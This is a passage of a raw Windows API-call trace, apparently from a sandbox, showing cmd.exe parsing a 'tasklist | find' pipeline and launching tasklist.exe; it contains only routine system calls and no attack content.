LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0140.599] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0140.599] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.599] GetConsoleTitleW (in: lpConsoleTitle=0x784e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0140.600] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0140.600] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0140.600] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0140.600] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0140.600] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0140.600] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0140.600] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0140.601] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0140.601] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0140.601] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0140.601] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0140.601] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0140.601] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0140.601] _wcsicmp (_String1="IF", _String2="find") returned 3 [0140.601] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0140.601] _wcsicmp (_String1="REM", _String2="find") returned 12 [0140.601] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0140.602] _pipe (in: _PtHandles=0x7851f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x7851f0) returned 0 [0140.603] _dup (_FileHandle=1) returned 5 [0140.603] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0140.603] _close (_FileHandle=4) returned 0 [0140.603] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0140.603] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0140.603] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0140.603] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0140.603] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0140.603] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0140.603] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0140.603] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0140.603] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0140.603] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0140.603] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0140.603] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0140.603] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0140.603] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0140.603] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0140.603] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0140.603] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0140.603] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0140.603] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0140.603] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0140.603] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0140.603] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0140.603] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0140.603] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0140.603] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0140.603] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0140.603] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0140.603] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0140.603] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0140.603] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0140.604] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0140.604] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0140.604] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0140.604] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0140.604] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0140.604] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0140.604] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0140.604] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0140.604] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0140.604] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0140.604] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0140.604] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0140.604] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0140.604] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0140.604] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0140.604] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0140.604] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0140.604] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0140.604] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0140.604] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0140.604] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0140.604] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0140.604] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0140.604] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0140.604] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0140.604] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0140.604] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0140.604] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0140.604] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0140.604] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0140.604] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0140.604] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0140.604] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0140.604] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0140.604] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0140.604] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0140.604] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0140.604] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0140.604] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0140.604] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0140.604] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0140.604] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0140.604] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0140.604] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0140.604] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0140.604] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0140.604] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0140.605] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0140.605] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0140.605] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0140.605] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0140.605] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0140.605] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0140.605] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0140.605] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0140.605] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0140.605] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0140.605] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0140.605] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0140.605] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0140.605] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0140.605] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0140.605] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0140.605] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0140.605] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0140.605] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0140.605] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0140.605] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0140.605] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0140.605] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0140.605] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0140.605] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0140.605] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0140.605] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0140.605] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0140.605] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0140.605] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0140.605] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0140.605] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0140.605] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0140.605] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0140.605] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0140.605] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0140.606] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0140.606] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0140.606] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0140.606] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0140.606] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0140.606] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0140.606] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0140.606] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0140.606] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0140.606] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0140.606] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0140.606] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0140.606] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0140.606] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0140.606] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0140.606] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0140.606] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0140.606] SetErrorMode (uMode=0x0) returned 0x0 [0140.606] SetErrorMode (uMode=0x1) returned 0x0 [0140.606] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x785228, lpFilePart=0x60f74c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x60f74c*="Desktop") returned 0x1c [0140.606] SetErrorMode (uMode=0x0) returned 0x1 [0140.606] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.606] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0140.610] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.611] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.611] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x60f4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f4d8) returned 0xffffffff [0140.611] GetLastError () returned 0x2 [0140.611] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.611] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x60f4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f4d8) returned 0x785530 [0140.611] FindClose (in: hFindFile=0x785530 | out: hFindFile=0x785530) returned 1 [0140.611] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x60f4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f4d8) returned 0xffffffff [0140.611] GetLastError () returned 0x2 [0140.611] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x60f4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f4d8) returned 0x785530 [0140.611] FindClose (in: hFindFile=0x785530 | out: hFindFile=0x785530) returned 1 [0140.612] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0140.612] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0140.612] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0140.612] SetErrorMode (uMode=0x0) returned 0x0 [0140.612] SetErrorMode (uMode=0x1) returned 0x0 [0140.612] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x78a3c0, lpFilePart=0x60f4f4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x60f4f4*="Desktop") returned 0x1c [0140.612] SetErrorMode (uMode=0x0) returned 0x1 [0140.612] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.612] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0140.612] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.612] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.612] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x60f280, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f280) returned 0xffffffff [0140.612] GetLastError () returned 0x2 [0140.612] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.612] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x60f280, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f280) returned 0x785628 [0140.612] FindClose (in: hFindFile=0x785628 | out: hFindFile=0x785628) returned 1 [0140.613] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x60f280, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f280) returned 0xffffffff [0140.613] GetLastError () returned 0x2 [0140.613] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x60f280, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f280) returned 0x785628 [0140.613] FindClose (in: hFindFile=0x785628 | out: hFindFile=0x785628) returned 1 [0140.613] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0140.613] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0140.613] GetConsoleTitleW (in: lpConsoleTitle=0x60f77c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0140.613] InitializeProcThreadAttributeList (in: lpAttributeList=0x60f6a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x60f68c | out: lpAttributeList=0x60f6a8, lpSize=0x60f68c) returned 1 [0140.613] UpdateProcThreadAttribute (in: lpAttributeList=0x60f6a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x60f694, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x60f6a8, lpPreviousValue=0x0) returned 1 [0140.613] GetStartupInfoW (in: lpStartupInfo=0x60f6e0 | out: lpStartupInfo=0x60f6e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x260, hStdError=0x2c)) [0140.613] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.613] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0140.613] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.613] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.613] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0140.613] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.613] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.613] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.613] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.614] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.614] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0140.615] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x60f630*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x60f67c | out: lpCommandLine="tasklist", lpProcessInformation=0x60f67c*(hProcess=0x64, hThread=0x60, dwProcessId=0x8f8, dwThreadId=0x8f0)) returned 1 [0140.618] CloseHandle (hObject=0x60) returned 1 [0140.619] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0140.619] GetEnvironmentStringsW () returned 0x7842d8* [0140.619] FreeEnvironmentStringsA (penv="=") returned 1 [0140.619] DeleteProcThreadAttributeList (in: lpAttributeList=0x60f6a8 | out: lpAttributeList=0x60f6a8) [0140.619] _get_osfhandle (_FileHandle=3) returned 0x54 [0140.619] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0140.619] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0140.619] _close (_FileHandle=5) returned 0 [0140.619] _dup (_FileHandle=0) returned 4 [0140.619] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0140.619] _close (_FileHandle=3) returned 0 [0140.619] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0140.619] SetErrorMode (uMode=0x0) returned 0x0 [0140.619] SetErrorMode (uMode=0x1) returned 0x0 [0140.619] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7842e0, lpFilePart=0x60f74c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x60f74c*="Desktop") returned 0x1c [0140.619] SetErrorMode (uMode=0x0) returned 0x1 [0140.619] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.619] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0140.619] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.620] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.620] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x60f4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f4d8) returned 0xffffffff [0140.620] GetLastError () returned 0x2 [0140.620] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.620] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x60f4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f4d8) returned 0x785628 [0140.620] FindClose (in: hFindFile=0x785628 | out: hFindFile=0x785628) returned 1 [0140.620] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x60f4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f4d8) returned 0xffffffff [0140.620] GetLastError () returned 0x2 [0140.620] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x60f4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f4d8) returned 0x785628 [0140.620] FindClose (in: hFindFile=0x785628 | out: hFindFile=0x785628) returned 1 [0140.620] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0140.620] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0140.620] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0140.620] SetErrorMode (uMode=0x0) returned 0x0 [0140.621] SetErrorMode (uMode=0x1) returned 0x0 [0140.621] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x784668, lpFilePart=0x60f4f4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x60f4f4*="Desktop") returned 0x1c [0140.621] SetErrorMode (uMode=0x0) returned 0x1 [0140.621] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.621] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0140.621] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.621] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.621] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x60f280, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f280) returned 0xffffffff [0140.621] GetLastError () returned 0x2 [0140.621] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.621] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x60f280, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f280) returned 0x7804a0 [0140.621] FindClose (in: hFindFile=0x7804a0 | out: hFindFile=0x7804a0) returned 1 [0140.621] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x60f280, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f280) returned 0xffffffff [0140.622] GetLastError () returned 0x2 [0140.622] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x60f280, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x60f280) returned 0x7804a0 [0140.622] 